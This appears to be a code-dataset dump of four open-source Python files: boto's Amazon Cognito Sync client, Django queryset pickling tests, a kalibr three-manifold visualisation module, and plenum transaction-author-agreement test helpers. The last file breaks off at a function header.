repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
ekalosak/boto
|
boto/cognito/sync/layer1.py
|
135
|
21122
|
# Copyright (c) 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from boto.compat import json
from boto.exception import JSONResponseError
from boto.connection import AWSAuthConnection
from boto.regioninfo import RegionInfo
from boto.cognito.sync import exceptions
class CognitoSyncConnection(AWSAuthConnection):
"""
Amazon Cognito Sync
Amazon Cognito Sync provides an AWS service and client library
that enable cross-device syncing of application-related user data.
High-level client libraries are available for both iOS and
Android. You can use these libraries to persist data locally so
that it's available even if the device is offline. Developer
credentials don't need to be stored on the mobile device to access
the service. You can use Amazon Cognito to obtain a normalized
user ID and credentials. User data is persisted in a dataset that
can store up to 1 MB of key-value pairs, and you can have up to 20
datasets per user identity.
With Amazon Cognito Sync, the data stored for each identity is
accessible only to credentials assigned to that identity. In order
to use the Cognito Sync service, you need to make API calls using
credentials retrieved with `Amazon Cognito Identity service`_.
"""
APIVersion = "2014-06-30"
DefaultRegionName = "us-east-1"
DefaultRegionEndpoint = "cognito-sync.us-east-1.amazonaws.com"
ResponseError = JSONResponseError
_faults = {
"LimitExceededException": exceptions.LimitExceededException,
"ResourceConflictException": exceptions.ResourceConflictException,
"InvalidConfigurationException": exceptions.InvalidConfigurationException,
"TooManyRequestsException": exceptions.TooManyRequestsException,
"InvalidParameterException": exceptions.InvalidParameterException,
"ResourceNotFoundException": exceptions.ResourceNotFoundException,
"InternalErrorException": exceptions.InternalErrorException,
"NotAuthorizedException": exceptions.NotAuthorizedException,
}
def __init__(self, **kwargs):
region = kwargs.get('region')
if not region:
region = RegionInfo(self, self.DefaultRegionName,
self.DefaultRegionEndpoint)
else:
del kwargs['region']
kwargs['host'] = region.endpoint
super(CognitoSyncConnection, self).__init__(**kwargs)
self.region = region
def _required_auth_capability(self):
return ['hmac-v4']
def delete_dataset(self, identity_pool_id, identity_id, dataset_name):
"""
Deletes the specific dataset. The dataset will be deleted
permanently, and the action can't be undone. Datasets that
this dataset was merged with will no longer report the merge.
Any consequent operation on this dataset will result in a
ResourceNotFoundException.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type identity_id: string
:param identity_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type dataset_name: string
:param dataset_name: A string of up to 128 characters. Allowed
characters are a-z, A-Z, 0-9, '_' (underscore), '-' (dash), and '.'
(dot).
"""
uri = '/identitypools/{0}/identities/{1}/datasets/{2}'.format(
identity_pool_id, identity_id, dataset_name)
return self.make_request('DELETE', uri, expected_status=200)
def describe_dataset(self, identity_pool_id, identity_id, dataset_name):
"""
Gets metadata about a dataset by identity and dataset name.
The credentials used to make this API call need to have access
to the identity data. With Amazon Cognito Sync, each identity
has access only to its own data. You should use Amazon Cognito
Identity service to retrieve the credentials necessary to make
this API call.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type identity_id: string
:param identity_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type dataset_name: string
:param dataset_name: A string of up to 128 characters. Allowed
characters are a-z, A-Z, 0-9, '_' (underscore), '-' (dash), and '.'
(dot).
"""
uri = '/identitypools/{0}/identities/{1}/datasets/{2}'.format(
identity_pool_id, identity_id, dataset_name)
return self.make_request('GET', uri, expected_status=200)
def describe_identity_pool_usage(self, identity_pool_id):
"""
Gets usage details (for example, data storage) about a
particular identity pool.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
"""
uri = '/identitypools/{0}'.format(identity_pool_id)
return self.make_request('GET', uri, expected_status=200)
def describe_identity_usage(self, identity_pool_id, identity_id):
"""
Gets usage information for an identity, including number of
datasets and data usage.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type identity_id: string
:param identity_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
"""
uri = '/identitypools/{0}/identities/{1}'.format(
identity_pool_id, identity_id)
return self.make_request('GET', uri, expected_status=200)
def get_identity_pool_configuration(self, identity_pool_id):
"""
Gets the configuration settings of an identity pool.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. This is the ID of the pool for which to return a
configuration.
"""
uri = '/identitypools/{0}/configuration'.format(identity_pool_id)
return self.make_request('GET', uri, expected_status=200)
def list_datasets(self, identity_pool_id, identity_id, next_token=None,
max_results=None):
"""
Lists datasets for an identity. The credentials used to make
this API call need to have access to the identity data. With
Amazon Cognito Sync, each identity has access only to its own
data. You should use Amazon Cognito Identity service to
retrieve the credentials necessary to make this API call.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type identity_id: string
:param identity_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type next_token: string
:param next_token: A pagination token for obtaining the next page of
results.
:type max_results: integer
:param max_results: The maximum number of results to be returned.
"""
uri = '/identitypools/{0}/identities/{1}/datasets'.format(
identity_pool_id, identity_id)
params = {}
headers = {}
query_params = {}
if next_token is not None:
query_params['nextToken'] = next_token
if max_results is not None:
query_params['maxResults'] = max_results
return self.make_request('GET', uri, expected_status=200,
data=json.dumps(params), headers=headers,
params=query_params)
def list_identity_pool_usage(self, next_token=None, max_results=None):
"""
Gets a list of identity pools registered with Cognito.
:type next_token: string
:param next_token: A pagination token for obtaining the next page of
results.
:type max_results: integer
:param max_results: The maximum number of results to be returned.
"""
uri = '/identitypools'
params = {}
headers = {}
query_params = {}
if next_token is not None:
query_params['nextToken'] = next_token
if max_results is not None:
query_params['maxResults'] = max_results
return self.make_request('GET', uri, expected_status=200,
data=json.dumps(params), headers=headers,
params=query_params)
def list_records(self, identity_pool_id, identity_id, dataset_name,
last_sync_count=None, next_token=None, max_results=None,
sync_session_token=None):
"""
Gets paginated records, optionally changed after a particular
sync count for a dataset and identity. The credentials used to
make this API call need to have access to the identity data.
With Amazon Cognito Sync, each identity has access only to its
own data. You should use Amazon Cognito Identity service to
retrieve the credentials necessary to make this API call.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type identity_id: string
:param identity_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type dataset_name: string
:param dataset_name: A string of up to 128 characters. Allowed
characters are a-z, A-Z, 0-9, '_' (underscore), '-' (dash), and '.'
(dot).
:type last_sync_count: long
:param last_sync_count: The last server sync count for this record.
:type next_token: string
:param next_token: A pagination token for obtaining the next page of
results.
:type max_results: integer
:param max_results: The maximum number of results to be returned.
:type sync_session_token: string
:param sync_session_token: A token containing a session ID, identity
ID, and expiration.
"""
uri = '/identitypools/{0}/identities/{1}/datasets/{2}/records'.format(
identity_pool_id, identity_id, dataset_name)
params = {}
headers = {}
query_params = {}
if last_sync_count is not None:
query_params['lastSyncCount'] = last_sync_count
if next_token is not None:
query_params['nextToken'] = next_token
if max_results is not None:
query_params['maxResults'] = max_results
if sync_session_token is not None:
query_params['syncSessionToken'] = sync_session_token
return self.make_request('GET', uri, expected_status=200,
data=json.dumps(params), headers=headers,
params=query_params)
def register_device(self, identity_pool_id, identity_id, platform, token):
"""
Registers a device to receive push sync notifications.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. Here, the ID of the pool that the identity belongs to.
:type identity_id: string
:param identity_id: The unique ID for this identity.
:type platform: string
:param platform: The SNS platform type (e.g. GCM, SDM, APNS,
APNS_SANDBOX).
:type token: string
:param token: The push token.
"""
uri = '/identitypools/{0}/identity/{1}/device'.format(
identity_pool_id, identity_id)
params = {'Platform': platform, 'Token': token, }
headers = {}
query_params = {}
return self.make_request('POST', uri, expected_status=200,
data=json.dumps(params), headers=headers,
params=query_params)
def set_identity_pool_configuration(self, identity_pool_id,
push_sync=None):
"""
Sets the necessary configuration for push sync.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. This is the ID of the pool to modify.
:type push_sync: dict
:param push_sync: Configuration options to be applied to the identity
pool.
"""
uri = '/identitypools/{0}/configuration'.format(identity_pool_id)
params = {}
headers = {}
query_params = {}
if push_sync is not None:
params['PushSync'] = push_sync
return self.make_request('POST', uri, expected_status=200,
data=json.dumps(params), headers=headers,
params=query_params)
def subscribe_to_dataset(self, identity_pool_id, identity_id,
dataset_name, device_id):
"""
Subscribes to receive notifications when a dataset is modified
by another device.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. The ID of the pool to which the identity belongs.
:type identity_id: string
:param identity_id: Unique ID for this identity.
:type dataset_name: string
:param dataset_name: The name of the dataset to subcribe to.
:type device_id: string
:param device_id: The unique ID generated for this device by Cognito.
"""
uri = '/identitypools/{0}/identities/{1}/datasets/{2}/subscriptions/{3}'.format(
identity_pool_id, identity_id, dataset_name, device_id)
return self.make_request('POST', uri, expected_status=200)
def unsubscribe_from_dataset(self, identity_pool_id, identity_id,
dataset_name, device_id):
"""
Unsubscribe from receiving notifications when a dataset is
modified by another device.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. The ID of the pool to which this identity belongs.
:type identity_id: string
:param identity_id: Unique ID for this identity.
:type dataset_name: string
:param dataset_name: The name of the dataset from which to unsubcribe.
:type device_id: string
:param device_id: The unique ID generated for this device by Cognito.
"""
uri = '/identitypools/{0}/identities/{1}/datasets/{2}/subscriptions/{3}'.format(
identity_pool_id, identity_id, dataset_name, device_id)
return self.make_request('DELETE', uri, expected_status=200)
def update_records(self, identity_pool_id, identity_id, dataset_name,
sync_session_token, device_id=None,
record_patches=None, client_context=None):
"""
Posts updates to records and add and delete records for a
dataset and user. The credentials used to make this API call
need to have access to the identity data. With Amazon Cognito
Sync, each identity has access only to its own data. You
should use Amazon Cognito Identity service to retrieve the
credentials necessary to make this API call.
:type identity_pool_id: string
:param identity_pool_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type identity_id: string
:param identity_id: A name-spaced GUID (for example, us-
east-1:23EC4050-6AEA-7089-A2DD-08002EXAMPLE) created by Amazon
Cognito. GUID generation is unique within a region.
:type dataset_name: string
:param dataset_name: A string of up to 128 characters. Allowed
characters are a-z, A-Z, 0-9, '_' (underscore), '-' (dash), and '.'
(dot).
:type device_id: string
:param device_id: The unique ID generated for this device by Cognito.
:type record_patches: list
:param record_patches: A list of patch operations.
:type sync_session_token: string
:param sync_session_token: The SyncSessionToken returned by a previous
call to ListRecords for this dataset and identity.
:type client_context: string
:param client_context: Intended to supply a device ID that will
populate the `lastModifiedBy` field referenced in other methods.
The `ClientContext` field is not yet implemented.
"""
uri = '/identitypools/{0}/identities/{1}/datasets/{2}'.format(
identity_pool_id, identity_id, dataset_name)
params = {'SyncSessionToken': sync_session_token, }
headers = {}
query_params = {}
if device_id is not None:
params['DeviceId'] = device_id
if record_patches is not None:
params['RecordPatches'] = record_patches
if client_context is not None:
headers['x-amz-Client-Context'] = client_context
if client_context is not None:
headers['x-amz-Client-Context'] = client_context
return self.make_request('POST', uri, expected_status=200,
data=json.dumps(params), headers=headers,
params=query_params)
def make_request(self, verb, resource, headers=None, data='',
expected_status=None, params=None):
if headers is None:
headers = {}
response = AWSAuthConnection.make_request(
self, verb, resource, headers=headers, data=data, params=params)
body = json.loads(response.read().decode('utf-8'))
if response.status == expected_status:
return body
else:
error_type = response.getheader('x-amzn-ErrorType').split(':')[0]
error_class = self._faults.get(error_type, self.ResponseError)
raise error_class(response.status, response.reason, body)
|
mit
|
rsvip/Django
|
tests/queryset_pickle/tests.py
|
42
|
6189
|
from __future__ import unicode_literals
import datetime
import pickle
import warnings
from django.test import TestCase
from django.utils.encoding import force_text
from django.utils.version import get_version
from .models import Container, Event, Group, Happening, M2MModel
class PickleabilityTestCase(TestCase):
def setUp(self):
Happening.objects.create() # make sure the defaults are working (#20158)
def assert_pickles(self, qs):
self.assertEqual(list(pickle.loads(pickle.dumps(qs))), list(qs))
def test_related_field(self):
g = Group.objects.create(name="Ponies Who Own Maybachs")
self.assert_pickles(Event.objects.filter(group=g.id))
def test_datetime_callable_default_all(self):
self.assert_pickles(Happening.objects.all())
def test_datetime_callable_default_filter(self):
self.assert_pickles(Happening.objects.filter(when=datetime.datetime.now()))
def test_lambda_as_default(self):
self.assert_pickles(Happening.objects.filter(name="test"))
def test_standalone_method_as_default(self):
self.assert_pickles(Happening.objects.filter(number1=1))
def test_staticmethod_as_default(self):
self.assert_pickles(Happening.objects.filter(number2=1))
def test_classmethod_as_default(self):
self.assert_pickles(Happening.objects.filter(number3=1))
def test_membermethod_as_default(self):
self.assert_pickles(Happening.objects.filter(number4=1))
def test_filter_reverse_fk(self):
self.assert_pickles(Group.objects.filter(event=1))
def test_doesnotexist_exception(self):
# Ticket #17776
original = Event.DoesNotExist("Doesn't exist")
unpickled = pickle.loads(pickle.dumps(original))
# Exceptions are not equal to equivalent instances of themselves, so
# can't just use assertEqual(original, unpickled)
self.assertEqual(original.__class__, unpickled.__class__)
self.assertEqual(original.args, unpickled.args)
def test_manager_pickle(self):
pickle.loads(pickle.dumps(Happening.objects))
def test_model_pickle(self):
"""
Test that a model not defined on module level is pickleable.
"""
original = Container.SomeModel(pk=1)
dumped = pickle.dumps(original)
reloaded = pickle.loads(dumped)
self.assertEqual(original, reloaded)
# Also, deferred dynamic model works
Container.SomeModel.objects.create(somefield=1)
original = Container.SomeModel.objects.defer('somefield')[0]
dumped = pickle.dumps(original)
reloaded = pickle.loads(dumped)
self.assertEqual(original, reloaded)
self.assertEqual(original.somefield, reloaded.somefield)
def test_model_pickle_m2m(self):
"""
Test intentionally the automatically created through model.
"""
m1 = M2MModel.objects.create()
g1 = Group.objects.create(name='foof')
m1.groups.add(g1)
m2m_through = M2MModel._meta.get_field('groups').remote_field.through
original = m2m_through.objects.get()
dumped = pickle.dumps(original)
reloaded = pickle.loads(dumped)
self.assertEqual(original, reloaded)
def test_model_pickle_dynamic(self):
class Meta:
proxy = True
dynclass = type(str("DynamicEventSubclass"), (Event, ),
{'Meta': Meta, '__module__': Event.__module__})
original = dynclass(pk=1)
dumped = pickle.dumps(original)
reloaded = pickle.loads(dumped)
self.assertEqual(original, reloaded)
self.assertIs(reloaded.__class__, dynclass)
def test_specialized_queryset(self):
self.assert_pickles(Happening.objects.values('name'))
self.assert_pickles(Happening.objects.values('name').dates('when', 'year'))
# With related field (#14515)
self.assert_pickles(
Event.objects.select_related('group').order_by('title').values_list('title', 'group__name')
)
def test_pickle_prefetch_related_idempotence(self):
g = Group.objects.create(name='foo')
groups = Group.objects.prefetch_related('event_set')
# First pickling
groups = pickle.loads(pickle.dumps(groups))
self.assertQuerysetEqual(groups, [g], lambda x: x)
# Second pickling
groups = pickle.loads(pickle.dumps(groups))
self.assertQuerysetEqual(groups, [g], lambda x: x)
def test_pickle_prefetch_related_with_m2m_and_objects_deletion(self):
"""
#24831 -- Cached properties on ManyToOneRel created in QuerySet.delete()
caused subsequent QuerySet pickling to fail.
"""
g = Group.objects.create(name='foo')
m2m = M2MModel.objects.create()
m2m.groups.add(g)
Group.objects.all().delete()
m2ms = M2MModel.objects.prefetch_related('groups')
m2ms = pickle.loads(pickle.dumps(m2ms))
self.assertQuerysetEqual(m2ms, [m2m], lambda x: x)
def test_missing_django_version_unpickling(self):
"""
#21430 -- Verifies a warning is raised for querysets that are
unpickled without a Django version
"""
qs = Group.missing_django_version_objects.all()
with warnings.catch_warnings(record=True) as recorded:
pickle.loads(pickle.dumps(qs))
msg = force_text(recorded.pop().message)
self.assertEqual(msg,
"Pickled queryset instance's Django version is not specified.")
def test_unsupported_unpickle(self):
"""
#21430 -- Verifies a warning is raised for querysets that are
unpickled with a different Django version than the current
"""
qs = Group.previous_django_version_objects.all()
with warnings.catch_warnings(record=True) as recorded:
pickle.loads(pickle.dumps(qs))
msg = force_text(recorded.pop().message)
self.assertEqual(
msg,
"Pickled queryset instance's Django version 1.0 does not "
"match the current version %s." % get_version()
)
|
bsd-3-clause
|
udrg/kalibr
|
aslam_nonparametric_estimation/bsplines/interp_rotation/threeManifoldVisual/__init__.py
|
5
|
4470
|
import visual
import thread
import time
import numpy
class Manifold :
class SceneObject(object) :
def __init__(self, visual):
self._visual = visual
def setOpacity(self, opacity):
self._visual.opacity = opacity
def setRadius(self, radius):
self._visual.radius = radius
class point(SceneObject) :
def __init__(self, pos, color, manifold):
self.__pos = pos
super(self.__class__, self).__init__(visual.sphere(radius = 0.1, pos = manifold.getCurrentPosVec(pos), color = color, display = manifold.display))
self._visual.point = self
self.__manifold = manifold
def __str__(self):
return str(self.__pos)
def setPos(self, pos):
self.__pos = pos
self.updatePos()
def updatePos(self):
self._visual.pos = self.__manifold.getCurrentPosVec(self.__pos)
class curve(SceneObject) :
def __init__(self, points, color, manifold):
self.__points = points
super(self.__class__, self).__init__(visual.curve(radius = 0.01, pos = [manifold.getCurrentPosVec(pos) for pos in points], color = color, display = manifold.display))
self.__manifold = manifold
def setPos(self, points):
self.__points = points
self.updatePos()
def updatePos(self):
self._visual.pos = [self.__manifold.getCurrentPosVec(pos) for pos in self.__points]
def __init__(self, startpos, geometry, title="threemanifoldView"):
self.display = visual.display(title = title)
self.objects = []
self.__currentpos = startpos
self.__geometry = geometry
self.__stepsize = 0.25
def addPoint(self, pos, color = visual.color.white):
p = Manifold.point(pos, color, self)
self.objects.append(p)
return p
def addCurve(self, points, color = visual.color.white):
p = Manifold.curve(points, color, self)
self.objects.append(p)
return p
def setZeroPointEnabled(self, enabled):
try:
self.__zeroPointSphere.hidden = enabled
except:
if enabled :
self.__zeroPointSphere = visual.sphere(radius = 0.1, opacity = 0.5)
def getCurrentPosVec(self, pos):
return self.__geometry.log(self.__currentpos, pos)
def getCurrentVecPos(self, vec):
return self.__geometry.exp(self.__currentpos, vec)
def setCurrentPos(self, pos):
self.__currentpos = pos
for p in self.objects :
p.updatePos()
# print self.__currentpos
def __interactionThread(self):
while True :
if self.display.kb.keys: # event waiting to be processed?
s = self.display.kb.getkey() # get keyboard info
handler = self.__keyHandler.get(s)
if handler:
handler()
else:
print "'" + s + "'"
print self.__keyHandler
elif self.display.mouse.events:
ev = self.display.mouse.getevent()
if ev.press :
try :
p = ev.pick.point
print p
except :
pass
else:
time.sleep(0.01)
def __step(self, vec):
self.setCurrentPos(self.getCurrentVecPos(numpy.array(vec) * self.__stepsize))
def getKeyHandler(self):
return self.__keyHandler;
def setKeyHandler(self, handler):
self.__keyHandler = handler;
def startInteractionThread(self):
try :
return self.__thread
except :
self.__keyHandler = {
"left" : lambda : self.__step((-1, 0, 0)),
"right" : lambda : self.__step((1, 0, 0)),
"page up" : lambda : self.__step((0, 1, 0)),
"page down" : lambda : self.__step((0, -1, 0)),
"up" : lambda : self.__step((0, 0, 1)),
"down" : lambda : self.__step((0, 0, -1)),
}
self.__thread = thread.start_new_thread(self.__interactionThread, ())
return self.__thread
|
bsd-3-clause
|
evernym/zeno
|
plenum/test/txn_author_agreement/helper.py
|
2
|
8887
|
import base64
import json
from _sha256 import sha256
import base58
from indy.ledger import build_txn_author_agreement_request, build_get_txn_author_agreement_request, \
build_get_acceptance_mechanisms_request, build_disable_all_txn_author_agreements_request
from typing import NamedTuple, Dict, Optional
from plenum.common.constants import CONFIG_LEDGER_ID, STATE_PROOF, ROOT_HASH, PROOF_NODES, MULTI_SIGNATURE, \
MULTI_SIGNATURE_PARTICIPANTS, MULTI_SIGNATURE_SIGNATURE, MULTI_SIGNATURE_VALUE, MULTI_SIGNATURE_VALUE_LEDGER_ID, \
MULTI_SIGNATURE_VALUE_STATE_ROOT, MULTI_SIGNATURE_VALUE_TXN_ROOT, MULTI_SIGNATURE_VALUE_POOL_STATE_ROOT, \
MULTI_SIGNATURE_VALUE_TIMESTAMP, TXN_AUTHOR_AGREEMENT_TEXT, TXN_AUTHOR_AGREEMENT_VERSION, \
AML_VERSION, AML, AML_CONTEXT, GET_TXN_AUTHOR_AGREEMENT_DIGEST, GET_TXN_AUTHOR_AGREEMENT_VERSION, \
OP_FIELD_NAME, DATA, TXN_TIME, REPLY, \
TXN_METADATA, TXN_METADATA_SEQ_NO, TXN_METADATA_TIME, GET_TXN_AUTHOR_AGREEMENT_AML_VERSION, \
GET_TXN_AUTHOR_AGREEMENT_AML_TIMESTAMP, TXN_AUTHOR_AGREEMENT_AML, TXN_AUTHOR_AGREEMENT_RETIREMENT_TS, TXN_TYPE, \
TXN_AUTHOR_AGREEMENT, TXN_AUTHOR_AGREEMENT_DIGEST, TXN_AUTHOR_AGREEMENT_RATIFICATION_TS, TXN_AUTHOR_AGREEMENT_DISABLE
from plenum.common.types import f
from plenum.common.util import randomString
from plenum.server.request_handlers.static_taa_helper import StaticTAAHelper
from plenum.server.request_handlers.txn_author_agreement_aml_handler import TxnAuthorAgreementAmlHandler
from plenum.server.request_managers.write_request_manager import WriteRequestManager
from plenum.test.helper import sdk_sign_and_submit_req, sdk_get_and_check_replies, sdk_sign_and_submit_op
from state.pruning_state import PruningState
TaaData = NamedTuple("TaaData", [
("text", str),
("version", str),
("seq_no", int),
("txn_time", int),
("digest", str)
])
TaaAmlData = NamedTuple("TaaAmlData", [
("version", str),
("aml", dict),
("amlContext", str),
("seq_no", int),
("txn_time", int)
])
def sdk_send_txn_author_agreement(looper, sdk_pool_handle, sdk_wallet, version: str,
text: Optional[str] = None,
ratified: Optional[int] = None,
retired: Optional[int] = None):
req = looper.loop.run_until_complete(build_txn_author_agreement_request(sdk_wallet[1], text, version,
ratified, retired))
rep = sdk_sign_and_submit_req(sdk_pool_handle, sdk_wallet, req)
return sdk_get_and_check_replies(looper, [rep])[0]
def sdk_send_txn_author_agreement_disable(looper, sdk_pool_handle, sdk_wallet):
req = looper.loop.run_until_complete(build_disable_all_txn_author_agreements_request(sdk_wallet[1]))
rep = sdk_sign_and_submit_req(sdk_pool_handle, sdk_wallet, req)
return sdk_get_and_check_replies(looper, [rep])[0]
def set_txn_author_agreement(
looper, sdk_pool_handle, sdk_wallet, text: str, version: str, ratified: int, retired: Optional[int]
) -> TaaData:
reply = sdk_send_txn_author_agreement(looper, sdk_pool_handle, sdk_wallet, version, text,
ratified=ratified, retired=retired)[1]
assert reply[OP_FIELD_NAME] == REPLY
result = reply[f.RESULT.nm]
return TaaData(
text, version,
seq_no=result[TXN_METADATA][TXN_METADATA_SEQ_NO],
txn_time=result[TXN_METADATA][TXN_METADATA_TIME],
# TODO: Add ratified?
digest=StaticTAAHelper.taa_digest(text, version)
)
def sdk_get_txn_author_agreement(looper, sdk_pool_handle, sdk_wallet,
digest: Optional[str] = None,
version: Optional[str] = None,
timestamp: Optional[int] = None):
params = {}
if digest is not None:
params[GET_TXN_AUTHOR_AGREEMENT_DIGEST] = digest
if version is not None:
params[GET_TXN_AUTHOR_AGREEMENT_VERSION] = version
if timestamp is not None:
params['timestamp'] = timestamp
req = looper.loop.run_until_complete(build_get_txn_author_agreement_request(sdk_wallet[1], json.dumps(params)))
rep = sdk_sign_and_submit_req(sdk_pool_handle, sdk_wallet, req)
return sdk_get_and_check_replies(looper, [rep])[0]
def sdk_get_taa_aml(looper, sdk_pool_handle, sdk_wallet,
version: Optional[str] = None,
timestamp: Optional[int] = None):
req = looper.loop.run_until_complete(build_get_acceptance_mechanisms_request(sdk_wallet[1], timestamp, version))
rep = sdk_sign_and_submit_req(sdk_pool_handle, sdk_wallet, req)
return sdk_get_and_check_replies(looper, [rep])[0]
def get_txn_author_agreement(
looper, sdk_pool_handle, sdk_wallet,
digest: Optional[str] = None,
version: Optional[str] = None,
timestamp: Optional[int] = None
) -> TaaData:
reply = sdk_get_txn_author_agreement(
looper, sdk_pool_handle, sdk_wallet,
digest=digest, version=version, timestamp=timestamp
)[1]
assert reply[OP_FIELD_NAME] == REPLY
result = reply[f.RESULT.nm]
return None if result[DATA] is None else TaaData(
text=result[DATA][TXN_AUTHOR_AGREEMENT_TEXT],
version=result[DATA][TXN_AUTHOR_AGREEMENT_VERSION],
seq_no=result[f.SEQ_NO.nm],
txn_time=result[TXN_TIME],
digest=result[DATA][TXN_AUTHOR_AGREEMENT_DIGEST]
)
def get_aml_req_handler(node):
aml_req_handler = node.write_manager.request_handlers[TXN_AUTHOR_AGREEMENT_AML][0]
assert isinstance(aml_req_handler, TxnAuthorAgreementAmlHandler)
return aml_req_handler
def taa_digest(text: str, version: str) -> str:
return sha256('{}{}'.format(version, text).encode()).hexdigest()
def check_state_proof(result, expected_key: Optional = None, expected_value: Optional = None):
# TODO: This was copy-pasted from indy node (and extended), probably there should be better place for it
assert STATE_PROOF in result
state_proof = result[STATE_PROOF]
assert ROOT_HASH in state_proof
assert state_proof[ROOT_HASH]
assert PROOF_NODES in state_proof
assert state_proof[PROOF_NODES]
assert MULTI_SIGNATURE in state_proof
multi_sig = state_proof[MULTI_SIGNATURE]
assert multi_sig
assert multi_sig[MULTI_SIGNATURE_PARTICIPANTS]
assert multi_sig[MULTI_SIGNATURE_SIGNATURE]
assert MULTI_SIGNATURE_VALUE in multi_sig
multi_sig_value = multi_sig[MULTI_SIGNATURE_VALUE]
assert MULTI_SIGNATURE_VALUE_LEDGER_ID in multi_sig_value
assert multi_sig_value[MULTI_SIGNATURE_VALUE_LEDGER_ID]
assert MULTI_SIGNATURE_VALUE_STATE_ROOT in multi_sig_value
assert multi_sig_value[MULTI_SIGNATURE_VALUE_STATE_ROOT]
assert MULTI_SIGNATURE_VALUE_TXN_ROOT in multi_sig_value
assert multi_sig_value[MULTI_SIGNATURE_VALUE_TXN_ROOT]
assert MULTI_SIGNATURE_VALUE_POOL_STATE_ROOT in multi_sig_value
assert multi_sig_value[MULTI_SIGNATURE_VALUE_POOL_STATE_ROOT]
assert MULTI_SIGNATURE_VALUE_TIMESTAMP in multi_sig_value
assert multi_sig_value[MULTI_SIGNATURE_VALUE_TIMESTAMP]
if expected_key is not None:
proof_nodes = base64.b64decode(state_proof[PROOF_NODES])
root_hash = base58.b58decode(state_proof[ROOT_HASH])
assert PruningState.verify_state_proof(root_hash,
expected_key,
expected_value,
proof_nodes, serialized=True)
# TODO: Validate signatures as well?
def expected_state_data(data: TaaData) -> Dict:
return {
'lsn': data.seq_no,
'lut': data.txn_time,
'val': {
TXN_AUTHOR_AGREEMENT_TEXT: data.text,
TXN_AUTHOR_AGREEMENT_VERSION: data.version,
TXN_AUTHOR_AGREEMENT_DIGEST: StaticTAAHelper.taa_digest(data.text, data.version),
TXN_AUTHOR_AGREEMENT_RATIFICATION_TS: data.txn_time
}
}
def expected_data(data: TaaData):
return {
TXN_AUTHOR_AGREEMENT_TEXT: data.text,
TXN_AUTHOR_AGREEMENT_VERSION: data.version,
TXN_AUTHOR_AGREEMENT_DIGEST: StaticTAAHelper.taa_digest(data.text, data.version),
TXN_AUTHOR_AGREEMENT_RATIFICATION_TS: data.txn_time
}, data.seq_no, data.txn_time
def expected_aml_data(data: TaaAmlData):
return {
AML_VERSION: data.version,
AML: data.aml,
AML_CONTEXT: data.amlContext
}, data.seq_no, data.txn_time
def gen_random_txn_author_agreement(text_size=1024, version_size=16):
